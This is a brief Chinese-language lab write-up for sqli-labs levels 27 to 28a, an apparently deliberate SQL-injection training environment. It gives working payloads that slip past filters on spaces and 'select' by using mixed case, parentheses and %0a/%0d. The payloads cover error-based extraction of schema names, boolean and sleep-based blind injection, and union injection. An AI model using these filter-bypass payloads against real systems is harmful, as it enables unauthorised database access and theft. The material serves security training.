sqli-labs(十二)（union以及select的过滤）

第二十七关：

这关禁用了空格和select，空格还是可以使用（）代替，select发现可以大小写绕过

输入?id=1'||extractvalue(1,concat(0x5c,(selEct(group_concat(schema_name))from(information_schema.schemata))))||'1'='1

这里还有个问题就是，空格被过滤了，貌似不能使用联合注入了。网上有人说可以使用%0a ，是可以的

 

还可以使用内联注释的/*! content */  但是这关过滤了/*  所以不行，不过我在第一关中尝试了 是可以的

 

第二十七a关：

和第二十七关一样，只是需要将报错注入改成盲注。

输入?id="||substr((seLEct(user())),1,1)="r

 

 使用延时的盲注如下

输入：?id="||if((substr((seLEct(user())),1,1)="r"),sleep(1),1)||"2"="1

 

第二十八关：

先看源码

\s代表先去掉多有空格，报错%0a，/i表示忽略大小写。

可以输入?id=0')union(select%0d1,database(),'3

 

第二十八a关：

比二十八关的过滤还少些，就不多说了。直接使用上面的expload就行。